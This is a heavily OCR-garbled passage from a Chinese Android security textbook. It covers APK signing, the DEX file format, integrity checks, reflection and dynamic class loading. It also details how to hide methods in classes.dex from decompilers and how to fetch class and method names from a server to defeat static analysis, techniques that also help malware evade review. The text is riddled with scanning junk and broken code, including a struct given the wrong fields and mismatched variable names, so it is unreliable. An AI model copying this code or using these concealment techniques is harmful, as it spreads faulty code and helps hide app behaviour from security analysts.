=== Lisi xj Ф Ezport Android Application lolx 
Project Checks Keystore selection 
ject! [firs Poe 
N 
而 вл === [хо @ E TZ 
图 10-19 选择 要 导出 的 项 目 图 10-20 文件 名 和 密码 
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(4) 单 击 Next 按钮 ， 在 弹出 的 界面 中 依次 输入 签名 文件 的 相关 信息 ， 如 图 10-21 所 示 。 
(5) 单 击 Next 按钮 ， 在 弹出 的 界面 中 输入 签名 文件 路 径 ， 如 图 10-22 所 示 。 


Ф Ezport Android Application Ini xj -ioj x] 
Key Creation. e Destination and key/certificate checks e 
Mis [ Destination АРК file: [E:\Wsers\apple\Wesktep\6\first. pk Bronse 
Password: 0000000000 
бо. fe e кеппи шилик 
Validity Gears): [S 
First and Last Wane: [guan 
Organizational Unit: 
Organization: [ы 
City or Locality: [inan 
State or Province: [thandong 
Country Code 0): [0531 
@ Finish casa @ <Back dee Ced 
10-21 输入 信息 图 10-22 输入 信息 
C6) Hiti Finish 按钮 后 即 可 完成 签名 文件 的 创建 工作 ， 生 成 的 有 签名 信息 的 APK 文件 ， 如 图 10-23 所 示 。 
ipi xi 
OO 1+ тюн, — 
组 织 ” misi - 共享 ” 刻录 EHR =- ШӨ 
Т 到 кани 类 型 大 小 
ате J first 2014/2/20 23:07 文件 
A i Sie ГРЕЧ 20/2/20 23:07 。。 91 助手 -应 用 安装 器 
ws 
19) тиди 
因 ялем 
视频 
= 
3 文档 
я йш i i 
| 2 个 对 象 


图 10-23 生成 的 安装 文件 
10.34 使 用 签名 文件 


生成 Android 程序 的 签名 文件 后 ， 可 以 通过 如 下 两 种 方式 使 用 。 
1. 命令 行 方式 
(1) 假设 生成 的 签名 文件 是 ChangeBackgroundWidgetapk， 则 最 终生 成 ChangeBackgroundWidget - 
signed.apk 为 Android 签名 后 的 APK 执行 文件 。 
输入 以 下 命令 行 : 


jarsigner -verbose -keystore ChangeBackgroundWidget.keystore -signedjar ChangeBackgroundWidget_signed. 
apk ChangeBackgroundWidget.apk ChangeBackgroundWidget.keystore 


注意 : 上 面 命令 中 间 不 换行 。 


e 
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(2) 按 Enter 键 ， 根 据 提 示 输 入 密 钥 库 的 口令 短语 〈 即 密码 ) ， 详 细 信 息 如 下 。 
输入 密 钥 库 的 口令 短语 : 
正在 添加 : META-INF/MANIFEST.MF 
正在 添加 : META-INF/CHANGEBA.SF 
正在 添加 : META-INF/CHANGEBA.RSA 
正在 签名 : res/drawablelicon.png 
正在 签名 : res/drawable/icon audio.png 
正在 签名 : res/drawable/icon_exit.png 
正在 签名 : res/drawable/icon_folder.png 
正在 签名 : res/drawable/icon_home.png 
正在 签名 : res/drawable/icon img.png 
正在 签名 : res/drawable/icon left.png 
正在 签名 : res/drawable/icon mantou.png 
正在 签名 : res/drawable/icon_other.png 
正在 签名 : res/drawable/icon pause.png 
正在 签名 : res/drawable/icon play.png 
正在 签名 : res/drawable/icon_return.png 
正在 签名 : res/drawable/icon_right.png 
正在 签名 : res/drawable/icon set.png 
正在 签名 : res/drawable/icon_text.png 
正在 签名 : res/drawable/icon xin.png 
正在 签名 : res/layout/fileitem.xml 
正在 签名 : res/layout/filelist.xml 
正在 签名 : res/layout/main.xml 
正在 签名 : res/layout/widget.xml 
正在 签名 : res/xml/widget_info.xml 
正在 签名 : AndroidManifest.xml 
正在 签名 : resources.arsc 
正在 签名 : classes.dex 
通过 上 述 过 程 处 理 后 ， 即 可 将 未 签名 文件 ChangeBackgroundWidget.apk 签名 为 ChangeBackground- 
Widget signed.apk。 
在 上 述 方式 中 ， 读 者 可 能 会 遇 到 以 下 问题 。 
(1) jarsigner: 无 法 打开 JAR 文件 ChangeBackgroundWidgetapk。 
解决 方法 :将 要 进行 签名 的 APK 放 到 对 应 的 文件 下 ,把 要 签名 的 ChangeBackgroundWidget.apk 放 到 JDK 
的 bin 文件 里 。 
(2) jarsigner 无 法 对 jar 进行 签名 : 
java.util.zip.ZipException: invalid entry compressed size (expected 1598 but got 1622 bytes). 
解决 方法 一 : Android 开发 网 提示 这 些 问 题 主 要 是 由 于 资源 文件 造成 的 ， 对 于 Android 开发 来 说 应 该 检 
FF res 文件 夹 中 的 文件 ， 逐 个 排查 。 这 个 问题 可 以 通过 升级 系统 的 JDK 和 IRE 版 本 来 解决 。 
解决 方法 二 : 这 是 因为 默认 给 APK 做 了 Debug 签名 ， 所 以 无 法 做 新 的 签名 。 这 时 就 必须 在 工程 名 处 右 
击 ， 在 弹出 的 快捷 菜单 中 选择 Android Tools | Export Unsigned Application Package 命令 。 
或 者 从 AndroidManifest.xml 的 Exporting 上 按钮 。 
然后 再 基于 这 个 导出 的 unsigned арк 作 签 名 , 导出 时 最 好 将 其 目录 选 在 之 前 产生 keystore 的 那个 目录 下 ， 
这 样 操作 起 来 就 方便 了 。 
2. 使 用 Eclipse 的 ADT 生成 
实际 上 ， 使 用 Eclipse 可 以 更 加 直观 、 方 便 地 生成 签名 文件 ， 具 体 流 程 如 下 。 


(1) Adi Eclipse 项 目 名 , 依次 选择 Android Tools | Export Signed Application Package 命令 , 如 图 10-24 
所 示 。 


图 10-24 Export Unsigned Application Package 
(2) 在 弹出 界面 中 选择 项 目 ， 如 图 10-25 所 示 。 


Performs a set of checks to make sure the application can be exported, 


ks U ———— 


10-25 选择 项 目 


(3) 单 击 Next 按钮 , 在 弹出 的 界面 中 选中 Use existing keystore 单 选 按钮 , 并 输入 文件 的 密码 , 如 图 10-26 
所 示 。 


图 10-26 输入 密码 
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(4) 单 击 Next 按钮 ， 输 入 原来 签名 文件 的 资料 和 密码 ， 按 照 默认 提示 完成 签名 。 在 Eclipse 界面 中 会 
显示 生成 的 签名 加 密 信息 ， 如 图 10-27 所 示 。 


E Problems @ Javadoc (©, Declaration a Console 22 
Android 


[2014-02-20 23:07:37 - first] New keystore C:Vsers\apple\Desktop\6\First.opk has been created. 
[2014-02-20 23:07:37 - first] Certificate finger| 


[2014-02-20 
[2014-02-20 23:07: 多 


- first] MD5 | @6:74:6@:23: 


:7C:FC:14:AD:54:D4:61:FF:DO 
- first] SHAl: 47:80:E6:38:9E:E9:38:83:2F:30:1A:CC:25:80:07:FF:F3:9E:23:F9 


E 


1027 加 密 信息 
10.3.5 ”发 布 到 市 场 


发 布 的 过 程 比较 简单 ， 来 到 Market， 登 录 个 人 中 心 ， 上 传 签名 后 的 文件 即 可 ， 具 体操 作 流程 在 Market 
站 点 上 有 详细 说 明 。 为 节省 本 书 的 篇 幅 ， 在 此 不 做 详细 介绍 。 


第 11 章 APK 的 自我 保护 机 制 


因为 绝 大 多 数 Android 应 用 程序 是 使 用 Java 语言 编写 的 ， 而 Java 语言 又 比较 容易 被 道 向 分 析 ， 所 以 
Android 应 用 程序 的 自我 保护 具有 一 定 的 意义 。 在 本 章 的 内 容 中 , 将 详细 讲解 现实 中 常用 的 Android APK А 
我 保护 技术 ， 这 些 АРК 自我 保护 技术 并 不 能 做 到 完全 的 保护 作用 ， 只 是 提高 了 逆向 分 析 的 难度 ， 在 实际 运 
用 中 应 该 根据 具体 情况 结合 使 用 。 希 望 读 者 认真 体会 ， 为 学 习 本 书后 面 的 知识 打下 基础 。 


11.1 24 DEX 文件 的 结构 


EI 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 11 章 \ 分 析 DEX 文件 的 结构 .avi 

Android APK 文件 是 由 DEX 文件 组 成 的 ,每 个 APK 包 都 会 包含 一 个 classes.dex 文件 ,此 文件 是 Android 
系统 运行 于 Dalvik Virtual Machine (Android 虚拟 机 ) 上 的 可 执行 文件 , 也 是 Android 应 用 程序 的 核心 所 在 。 
所 以 简要 了 解 DEX 文件 的 结构 ， 对 掌握 分 析 APK 自我 保护 机 制 的 知识 大 有 益处 。 


11.1.1 DEX 文件 的 基本 结构 


在 Android 系统 的 运行 机 制 中 , 需要 从 Java 源 文件 (当然 Android 也 支持 INI 的 调用 方式 ) 生 成 DEX 
文件 ， 具 体 过 程 是 Java 源 文件 通过 Java 编译 器 生成 CLASS 文件 ， 再 通过 dx 工具 转换 为 classes.dex 文件 。 
DEX 文件 从 整体 上 来 看 是 一 个 索引 的 结构 ， 类 名 、 方 法 名 、 字 段 名 等 信息 都 存储 在 常量 池 中 ， 这 样 能 够 充 
分 减少 存储 空间 ， 一 个 DEX 文件 的 基本 结构 如 图 11-1 所 示 ， 相 关 结 构 声 明定 义 在 DexFileh 中 , 在 AOSP 
中 的 路 径 为 /dalvik/libdex/DexFile.h。 


header 


string ide. 


typeids 


proto. ids 


field ids 


method іс 


class dets 


图 11-1 一 个 DEX 文件 的 基本 结构 
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(1) header: 是 DEX 文件 头 ， 包 含 magic 字段 、adler32 校 验 值 、SHA-1 哈 希 值 、string_ids 的 个 数 以 
及 偏 移 地 址 等 。DEX 文件 的 头 结构 很 固定 ， 占 用 0x70 个 字 节 ， 具 体 定义 代码 如 下 所 示 。 
struct DexHeader{ 
u1 magic[8]; /* includes version number */ 
u4 checksum; /* adler32 checksum */ 
u1 signature[kSHA1DigestLen]; /* SHA-1 hash */ 
u4 fileSize; /* length of entire file */ 
u4 headerSize; /* offset to start of next section */ 
u4 endianTag; 
u4 linkSize; 
u4 linkOff; 
u4 mapOff; 
u4 stringldsSize; 
u4 stringldsOff; 
u4 typeldsSize; 
u4 typeldsOff; 
u4 protoldsSize; 
u4 protoldsOff; 
u4 fieldldsSize; 
u4 fieldIdsOff; 
u4 methodldsSize; 
u4 methodldsOff; 
u4 classDefsSize; 
u4 classDefsOff; 
u4 dataSize; 
u4 dataOff; 
y 
(2) DexStringld: 定义 了 字符 串 数据 的 偏 移 ，stringDataO 任 指向 字符 串 数据 ， 具 体 定 义 代 码 如 下 所 示 。 
struct DexStringld ( 
u4 stringDataOff, /* file offset to string data item */ 
y 
(3) DexTypeld: 表示 应 用 程序 代码 中 使 用 到 的 具体 类 型 ， 例 如 整 型 、 字 符 串 等 ， 其 中 descriptorldx 指 
向 DexStringld 列表 的 索引 。 有 具体 定义 代码 如 下 所 示 。 
struct DexTypeld ( 
u4 descriptorldx; /* index into stringlds list for type descriptor */ 
y 
(4) DexProtold: 表示 方法 声明 的 结构 体 ，shortyIdx 是 方法 声明 字符 串 ， 格 式 为 返回 值 类 型 后 紧 跟 参 
数列 表 类 型 。 假 如 方法 声明 为 VI， 则 表示 返回 值 为 V( 空 ， 无 返回 值 》、 参 数 为 1 ( 整 型 ) 、 所 有 的 引用 类 
型 用 工 表 示 。 returnTypeldx 指向 DexTypeld 列表 的 索引 , 表示 返回 值 类 型 ; parametersOff 指向 DexTypeList 
的 偏 移 ， 表 示 参 数列 表 类 型 。 具 体 代 码 如 下 所 示 。 
struct DexProtold { 
u2 classldx; /* index into typelds list for defining class */ 
u2 typeldx; /* index into typelds for field type */ 
u4 nameldx; /* index into stringlds for field name */ 
y 
(5) DexFieldId: 表示 代码 中 的 字段 ，classIdx 指向 DexTypeld 列表 索引 , 表示 字段 所 属 的 类 ; typeldx 
表示 字段 类 型 ，nameldx 指向 DexStringld 列表 索引 ， 表 示 字 段 名 。 具 体 代 码 如 下 所 示 。 
struct DexFieldld { 
u2 classldx; /* index into typelds list for defining class */ 
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U2 typeldx; /* index into typelds for field type */ 

u4 nameldx; /* index into stringlds for field name */ 

y 

(6) DexMethodId: 表示 代码 中 使 用 的 方法 ，classIdx 表示 方法 所 属 的 类 ，protoldx 指向 DexProtold 列 
表 索 引 ， 表 示 方 法 原型 ，nameldx 表示 方法 名 。 具 体 代 码 如 下 所 示 。 

struct DexMethodld ( 

U2 сіаѕ51ах; /* index into typelds list for defining class */ 

u2 protoldx; /* index into protolds for method prototype */ 

u4 nameldx; /* index into stringlds for method name */ 

y: 
(7) DexClassDef: 该 结构 定义 了 代码 中 使 用 的 类 和 相关 的 代码 指令 ， 有 具体 代码 如 下 所 示 。 
struct DexClassDef ( 
u4 classldx; /* index into typelds for this class */ 
u4 accessFlags; 
u4 superclassldx; /* index into typelds for superclass */ 
u4 interfacesOff, /* file offset to DexTypeList */ 
u4 sourceFileldx; /* index into stringlds for source file name */ 
u4 annotationsOff; /* file offset to annotations directory item */ 
u4 classDataOff, /* file offset to class data item */ 
u4 staticValuesOff; /* file offset to DexEncodedArray */ 

y 
0 classldx: 指向 DexTypeld 列 表 索 引 , 表示 该 类 的 类 型 ;accessFlags 是 类 的 访问 标志 , 如 public、 private, 
static 等 。 
superclassIdx: 表示 父 类 的 类 型 。 
interfacesOff: 指向 一 个 DexTypeList 的 偏 移 值 。 
sourceFileldx: 指向 DexStringldx 列表 的 索引 ， 表 示 类 所 在 的 源 文件 名 称 。 
annotationsOff: 指向 注解 目录 结构 。 
classDataOff: 指向 DexClassData 结构 ， 表 示 类 的 数据 部 分 。 
staticValuesOff: 表示 类 中 的 静态 数据 。 
(8) DexClassData: 此 结构 体 在 文件 DexClass.h 中 定义 , 路 径 为 /dalvik/libdex/DexClass.h。 在 header 中 
也 含 了 静态 字段 个 数 、 实 例 字 段 个 数 、 直 接 方法 〈 通 过 类 直接 访问 的 方法 ) 个 数 和 虚 方 法 〈 通 过 类 实例 访 
问 的 方法 ) 个 数 。 具 体 代码 如 下 所 示 。 

struct DexClassData { 

DexClassDataHeader header; 

DexField* staticFields; 

DexField* instanceFields; 

DexMethod* directMethods; 

DexMethod* virtualMethods; 

Е 

(9) DexField: 表示 字段 的 类 型 和 访问 标志 ，fieldIdx 指向 DexFieldId。 具 体 代码 如 下 所 示 。 

struct DexField ( 

u4 fieldldx; /* index to a field id item */ 

u4 accessFlags; 

y 
(10) DexMethod: 描述 了 方法 的 原型 、 名 称 、 访 问 标志 以 及 代码 指令 的 偏 移 地 址 ，methodIdx 指向 
DexMethodId 索引 ， 在 Google 的 DEX 文件 文档 中 进行 了 如 下 定义 。 

index into the method ids list for the identity of this method (includes the name and descriptor), 
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represented as a difference from the index of previous element in the list. The index of the first 

element in a list is represented directly 

这 表示 在 DEX 文件 中 ，methodIdx 是 相对 于 前 一 个 DexMethod 中 的 methodIdx 的 增 量 ， 例 如 ， 一 个 类 
中 有 两 个 directMethods, 第 一 个 directMethod 的 methodIdx 值 为 0x13, 表示 指向 索引 为 0x13 的 methodldx, 
那么 第 二 个 directMethod 的 methodIdx 的 值 是 相对 于 前 一 个 值 的 增 量 , 例如 0x01, 表示 指向 索引 为 0x14 的 
methodldx; accessFlags 表示 方法 的 访问 标志 ，codeOff 表示 指令 代码 的 偏 移 地 址 。DexMethod 的 具体 实现 代 
码 如 下 所 示 。 

struct DexMethod { 

u4 methodldx; /* index to a method id item */ 

u4 accessFlags; 

u4 codeOff, /* file offset to а code item */ 

y 

声明 结构 体 DexCode 的 代码 如 下 所 示 。 

struct DexCode { 

u2 registersSize; 

u2 insSize; 

U2 outsSize; 

u2 triesSize; 

u4 debuglnfoOff, /* file offset to debug info stream */ 

u4 insnsSize; /* size of the insns array, in u2 units */ 

u2 insns[1]; 

/* followed by optional u2 padding */ 

/* followed by try. item[triesSize] */ 

/* followed by uleb128 handlersSize */ 

ү followed by catch_handler_item[handlersSize] */ 


ext DexClass.h 中 ， 实 际 上 所 有 的 u4 类 型 是 uleb128 类 型 ， 每 个 uleb128 类 型 是 leb128 的 无 符号 
类 型 ， 每 个 leb128 类 型 的 数据 包含 1 一 5 个 字 节 ， 表 示 一 个 32bit 的 数值 。 每 个 字 节 只 有 7 位 有 效 ， 最 高 一 
位 用 来 表示 是 否 需 要 使 用 到 下 一 个 字 节 ， 例 如 第 1 个 字 节 最 高 位 为 1， 表 示 还 需要 使 用 到 第 2 个 字 节 ， 如 果 
第 二 个 字 节 的 最 高 位 为 1， 表 示 会 使 用 到 第 3 个 字 节 ， 以 此 类 推 ， 最 多 5 个 字 节 


11.1.2 ”隐藏 DEX 中 的 特定 方法 


在 DEX 的 文件 结构 中 ， 可 以 实现 对 DEX 中 特定 方法 的 隐藏 ， 这 样 在 使 用 
baksmali 或 者 apktool 等 反 编译 工具 对 classes.dex 文件 进行 反 汇编 时 , 将 无 法 发 
现 隐藏 的 方法 。 但 是 当 有 特定 的 现象 发 生 时 ， 其 实 也 是 比较 容易 检测 出 来 的 。 

在 DEX 文件 格式 中 , method 的 结构 体 是 DexMethod, 如 果 将 methodldx 的 
值 指向 另 一 个 method， 同 时 修改 相应 的 代码 偏 移 量 codeOff (accessFlags 一 般 
不 需要 修改 ) ， 并 修改 后 续 相应 的 methodIdx， 这 样 可 以 隐藏 特定 的 方法 。 在 
修改 DEX 文件 后 ， 需 要 重新 计算 DEX 文件 的 SHAI 值 以 及 校 验 值 ， 以 便 可 以 
更 新 DEX 文件 。 

在 DEX 的 文件 结构 中 ， 隐 藏 一 个 方法 的 基本 步骤 如 下 所 示 。 

(1) 修改 DEX 文件 中 需要 隐藏 方法 的 DexMethod 结构 体 ， 例 如 ， 在 图 11-2 
中 隐藏 了 方法 B。 
在 图 11-2 的 隐藏 过 程 中 ， 有 具体 说 明 如 下 所 示 。 
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Q 将 DexMethod 中 的 methodldx 值 设 为 0x0， 即 将 原先 的 方法 指向 了 前 一 个 方法 。 
О 因为 在 DEX 文 件 格式 里 ，directMethods 和 virtualMethods 是 分 开 的 ， 所 以 一 般 无 需 修改 访问 标志 符 
accessFlags。 
口 将 codeOffset 设置 为 前 一 个 方法 的 代码 偏 移 地 址 。 
更 新 需要 隐藏 方法 的 下 一 个 方法 的 methodIdx， 通 过 如 下 公式 实现 这 一 功能 。 
next method idx-original next method idx + original method idx 
(2) 重新 计算 Dex 的 SHAI 哈 希 值 和 Adler 校 验 值 ， 然 后 更 新 DexHeader， 使 用 DexFixer 修复 
classes.dex 文件 。 
G) 重新 打包 生成 APK 文件 ， 具 体 流程 如 下 所 示 。 
OQ 解压 缩 APK， 提 取 其 中 除 META-INF 文件 夹 之 外 的 所 有 文件 。 
О 压缩 成 ZIP 格 式 文件 。 
О 使 用 jarsigner 或 者 其 他 工具 对 生成 的 ZIP 文 件 签名 ， 将 后 级 名 修改 为 .apk。 
这 样 经 过 上 述 隐藏 操作 之 后 ， 接 下 来 需要 在 程序 中 调用 被 隐藏 的 方法 。 调 用 隐藏 方法 的 具体 流程 如 下 所 示 。 
C1) 使 用 反射 调用 方法 android.content.res.AssetManager.openNonAsset0) 打 开 当 前 应 用 程序 的 classes.dex Ж 
fr, 然后 将 数据 保存 到 内 存 中 。 另 外 ,还 可 以 通过 调用 Context.getPackageCodePath() 来 获得 当前 应 用 程序 对 
应 的 APK 文件 的 路 径 ， 通 过 这 个 路 径 构造 ZipFile 对 象 ， 这 样 可 以 获取 classes.dex 的 ZipEntry， 接 下 来 利用 
ZipFile 的 getInputStream(ZipEntry) 方 法 获取 classes.dex 的 数据 流 ， 其 核心 代码 如 下 所 示 。 
String apkPath = this.getPackageCodePath(); 
ZipFile apkfile = new ZipFile(apkPath); 
ZipEntry dexentry = zipfile.getEntry("classes.dex"); 
InputStream dexstream = zipfile.getlnputStream(dexentry); 
(2) 修复 DEX 文件 ， 恢 复 前 面 隐藏 方法 的 DexMethod 结构 体 。 
(3) 使 用 类 加 载 器 重新 加 载 修复 后 的 DEX 数据 。 
(4) 搜索 被 隐藏 的 方法 ， 调 用 被 隐藏 的 方法 。 
在 上 述 隐 藏 过 程 中 需要 注意 ， 在 DEX 文件 中 的 方法 是 按 方 法 名 的 字典 序 排序 的 ， 所 以 需要 隐藏 的 方法 
如 果 是 该 类 中 所 有 方法 排序 第 一 个 ， 那 么 methodIdx 值 是 一 个 绝对 值 。 如 果 隐 藏 操作 不 是 很 方便 ， 建 议 可 以 
编写 一 个 无 用 的 方法 ， 其 方法 名 排序 为 第 一 个 ,让 需要 隐藏 的 方法 重新 指向 该 方法 。 使 用 修改 methodIdx 的 
方法 ， 让 其 指向 另 一 个 DexMethodld 的 结构 体 ， 如 果 使 用 baksmali 进行 反 汇 编 ， 则 会 发 现在 一 个 类 中 有 两 
个 完全 相同 的 函数 。 
在 结构 体 DexClassData 的 头 部 DexClassDataHeader 中 ，directMethodsSize 和 virtualMethodsSize 分 别 表 
示 直 接 方 法 的 个 数 和 虚 方 法 的 个 数 。 如 果 想 要 隐藏 某 个 方法 ， 可 以 通过 将 相应 的 directMethodsSize 或 
virtualMethodsSize WÈ 1， 同 时 将 表示 该 需要 隐藏 方法 的 DexMethod 结构 体 中 的 数据 全 部 修改 为 0, 这样 就 
可 以 将 该 方法 隐藏 起 来 。 当 使 用 baksmali 进行 反 汇编 操作 时 ， 不 会 显示 出 该 方法 的 反 汇 编 代 码 。 
SER: 上 述 介绍 的 隐藏 方法 操作 都 没 能 隐藏 掉 DexMethodId 结构 体 ， 在 这 个 结构 体 中 包含 了 方法 所 属 
的 类 名 、 原 型 声明 以 及 方法 名 ,攻击 者 可 以 通过 对 比 DexMethodId 的 个 数 和 DexMethod 结 构 体 的 
个 数 来 判断 是 否 存在 方法 隐藏 的 问题 。 
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Ши 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 11 章 \ 完 整 性 校 验 .avi 
这 里 的 完整 性 校 验 分 为 DEX 完整 性 校 验 和 АРК 完整 性 校 验 两 大 类 ， 本 节 将 详细 讲解 这 两 种 完整 性 校 


e 


sue APK 的 百 未 保 pa 


验 的 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 
11.2.1 DEX 完整 性 校 验 


在 Android 系统 中 ， 因 为 classes.dex 能 够 完成 大 多 数 逻 辑 业 务 ， 所 以 很 多 针对 Android 应 用 程序 的 攻击 
和 自 改 操作 都 是 针对 classes.dex 文件 进行 的 。 正 因 如 此 , 在 APK 的 自我 保护 机 制 中 , 可 以 考虑 对 classes.dex 
文件 进行 完整 性 校 验 。 例 如 ， 可 以 通过 CRC 校 验 完成 ， 也 可 以 检查 Hash 值 。 因 为 只 是 检查 classes.dex 文 
件 ， 所 以 可 以 将 CRC 值 存储 在 string 资源 文件 中 ， 当 然 也 可 以 放 在 自己 的 服务 器 上 ， 通 过 运行 时 从 服务 器 
获取 校 验 值 。 上 述 操作 的 基本 步骤 如 下 所 示 。 
СТ) 在 代码 中 完成 校 验 值 比 对 的 逻辑 ， 此 部 分 代码 后 续 将 不 能 再 发 生变 化 ， 否 则 CRC 的 值 会 发 生变 化 。 
(2) 在 生成 的 APK 文件 中 提取 出 classes.dex 文件 ， 计 算 其 CRC 值 ， 其 他 Hash 值 的 计算 过 程 也 类 似 。 
(3) 将 计算 出 的 值 放 入 文件 strings.xml 中 。 
上 述 操作 过 程 的 核心 实现 代码 如 下 所 示 。 
String apkPath = this.getPackageCodePath(); 
Long dexCrc = Long.parseLong(this.getString(R.string.dex crc)); 
rie zipfile new ZipFile(apkPath); 
ZipEntry dexentry - zipfile.getEntry("classes.dex"); 
if(dexentry.getCrc() != dexCrc)( 
System.out.printin("Dex has been *modified!"); 
Jelse( 
System.out.println("Dex hasn't been modified!"); 


} 

) catch (IOException e) { 

11 TODO Auto-generated catch block 
e.printStackTrace(); 


} 

对 于 上 述 保护 方式 来 说 ， 还 是 很 容易 被 暴力 破解 攻破 。 最 终 完 整 性 校 验 会 通过 返回 true/false 来 控制 后 
续 代码 逻辑 的 走向 ， 如 果 攻 击 者 直接 修改 代码 的 逻辑 ， 而 完整 性 检查 始终 返回 true， 那 么 上 述 操作 方法 会 无 
效 。 由 此 可 见 ， 类 似 文件 完整 性 校 验 需要 配合 一 些 其 他 方法 ， 或 者 有 其 他 更 为 巧妙 的 其 他 方式 来 实现 。 


11.2.2 APK 完整 性 校 验 


尽管 Android 应 用 程序 的 主要 逻辑 是 通过 classes.dex 文件 执行 的 ， 但 是 其 他 次 要 文件 也 会 影响 到 整个 程 
序 的 逻辑 走向 。 例如 , 在 11.2.1 节 中 的 DEX 文件 校 验 操作 中 ,如 果 程 序 需要 用 到 文件 strings.xml 中 的 某 些 值 ， 
那么 修改 这 些 值 后 就 会 影响 到 整个 程序 的 运行 。 这 个 时 候 可 以 考虑 对 整个 APK 文件 的 完整 性 进行 校 验 。 

如 果 对 整个 APK 文件 进行 完整 性 校 验 操作 ， 如 果 在 开发 Android 应 用 程序 时 进行 ， 将 无 法 知道 完整 
APK 文件 的 Hash 值 ,所 以 这 个 Hash 值 的 存储 将 无 法 像 DEX 完整 性 校 验 那 样 被 保存 在 文件 strings.xml 中 ， 
此 时 可 以 考虑 将 这 些 值 放 在 服务 器 端 。 上 述 操作 的 核心 实现 代码 如 下 所 示 。 

MessageDigest msgDigest = null; 


try{ 

msgDigest = MessageDigest.getlnstance("MD5") 
byte[ ] bytes = new byte[8192]; 

int byteCount; 

FileInputStream fis = null; 
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fis = new FilelnputStream(new File(apkPath)); 

while ((byteCount = fis.read(bytes)) > 0) 
msgDigest.update(bytes, 0, byteCount); 

BigInteger bi = new Biglnteger(1, msgDigest.digest()); 
String md5 = bi.toString(16); 

fis.close(); 


ГА 
从 服务 器 获取 存储 的 Hash 值 ， 并 进行 比较 
M 

) catch (Exception e) ( 

e.printStackTrace(); 

} 


11.3 Java 反射 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 11 章 \Java 反射 .avi 

因为 Android 应 用 程序 主要 是 使 用 Java 语言 开发 的 ， 而 在 Java 程序 中 可 以 使 用 反射 技术 来 更 加 灵活 地 
他 制程 序 的 运行 ， 所 以 在 Android 程序 中 也 可 以 使 用 反射 为 Java 运行 时 的 行为 提供 强大 的 支持 。Java 反射 
机 制 允 许 运行 中 的 Java 程序 对 自身 进行 检查 ， 并 能 直接 操作 程序 的 内 部 属性 或 方法 ， 可 动态 生成 类 实例 、 
变更 属性 内 容 以 及 调用 方法 。 

在 Android 应 用 程序 中 可 以 使 用 反射 技术 来 动态 调用 方法 ， 可 以 增加 对 应 用 程序 进行 静态 分 析 的 难度 。 
例如 ， 下 面 的 演示 代码 是 一 个 使 用 Java 反射 的 简单 例子 ， 在 类 Reflection 保存 了 需要 使 用 反射 调用 的 方法 。 

public class Reflection { 


public void methodA()( 
System.out.printin("Invoke methodA"); 


} 

public void methodB()( 
System.out.printin("Invoke methodB"); 
} 


} 
而 下 面 的 代码 实现 了 对 类 Reflection 中 方法 的 直接 调用 和 反射 调用 操作 。 
protected void onCreate(Bundle savedinstanceState) ( 


Reflection reflection = new Reflection(); 

reflection.methodA(); 

reflection.methodB(); 

Class[ ] consTypes = new Class[ ]{ }; 

Class reflectionCls = null; 

String className = "com.example.reflection.Reflection"; 

String methodName = "methodA"; 

try{ 

reflectionCls = Class.forName(className); 

Constructor cons = reflectionCls.getConstructor(cons Types); 

Reflection reflectionIns = (Reflection) cons.newInstance(new Object{ K }); 
Method method = reflectionCls.getDeclaredMethod(methodName, new Class[ K }); 
method.invoke(reflectionIns, new Object[]{ )); 

} catch (Exception e) { 


@ 
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11 TODO Auto-generated catch block 
e.printStackTrace(); 
H 


) 
但 是 上 述 Java 反射 代码 十 分 简单 , 所 以 当 使 用 dex2jar 反 编 译 操作 后 , 使 用 jd-gui 打开 后 还 是 可 以 识别 
出 需要 调用 的 方法 ， 如 图 11-3 所 示 。 
try 
{ 
Class localClass = Class.forName("com.example.reflection.Reflection"); 
Reflection localReflection2 = (Reflection)localClass.getConstructor (arrayOfClass).newInstance (new Object[0]); 
localClass.getDeclaredMethod("methodA", new Class[0]).invoke(localReflection2, new Object[0]):; 
return; 
} 
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接 下 来 需要 进一步 采取 措施 增加 静态 分 析 的 难度 。 因 为 在 反射 调用 时 需要 获取 调用 的 类 名 和 方法 名 ， 
而 在 上 述 代码 中 将 需要 调用 的 类 名 或 方法 直接 编码 在 代码 中 , 这 样 一 方面 违背 了 Java 反射 使 用 的 场景 , Java 
反射 主要 是 为 了 提供 程序 的 运行 时 动态 行为 的 控制 ， 另 一 方面 并 没有 增加 静态 分 析 的 难度 。 此 时 可 以 根据 
程序 运行 过 程 中 的 实时 状态 来 调用 相应 的 方法 ， 这 样 可 以 进一步 提高 静态 分 析 的 难度 。 例 如 ， 根 据 当前 应 
用 程序 的 状态 ， 可 以 从 网 络 服务 器 获取 需要 进行 反射 调用 的 方法 以 及 参数 信息 。 在 上 述 获 取 过 程 中 ， 可 以 
从 网 络 获取 类 名 和 方法 。 这 样 做 的 好 处 是 ， 使 仅 通 过 静态 分 析 无 法 获知 程序 运行 过 程 中 实际 调用 的 方法 ， 
增加 自动 化 分 析 的 难度 。 也 可 以 使 用 反射 加 密 的 方式 加 密 处 理 类 名 和 方法 名 ， 在 实际 调用 时 再 进行 解密 操 
作 。 但 是 上 述 处 理 方式 可 能 会 影响 性 能 ， 因 为 不 但 Java 反射 对 性 能 本 身 就 有 一 定 影响 ， 而 且 必须 申请 网 络 
连接 的 权限 ， 并 同时 需要 接 入 网 络 。 


11.4 动态 加 载 
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在 Android 系统 中 , 可 以 通过 DexClassLoader 来 支持 在 程序 运行 过 程 中 动态 加 载 包含 classes.dex 的 .jar 
或 .apk 文件 ， 结 合 Java 反射 技术 可 以 实现 执行 非 应 用 程序 部 分 的 代码 。 通 过 动态 加 载 技 术 不 但 可 以 提高 逆 
向 分 析 的 难度 ， 而 且 可 以 在 一 定 程度 上 保护 APK 自身 的 业务 逻辑 防止 被 破解 。 

在 Android 系统 中 ，DexClassLoader 构造 函数 原型 如 下 所 示 。 

public DexClassLoader (String dexPath, 

String optimizedDirectory, 

StringlibraryPath, 

ClassLoader parent 


) 

其 中 , dexPath 表示 包含 DEX 文件 的 .apk 或 jar #442, optimizedDirectory 是 优化 后 的 DEX 文件 的 路 径 ， 
libraryPath 表示 Native (ЖА) 库 的 路 径 ，parent 表示 父 类 加 载 器 。 通 过 DexClassLoader 实例 化 对 象 调用 
loadClass 加 载 需要 调用 的 类 ， 在 获得 Class 对 象 后 可 以 进一步 使 用 Java 反射 技术 来 调用 相应 的 方法 。 具 体 
代码 如 下 所 示 。 

DexClassLoader classLoader = new DexClassLoader(apkPath, dexPath, null, 

getClassLoader()); 


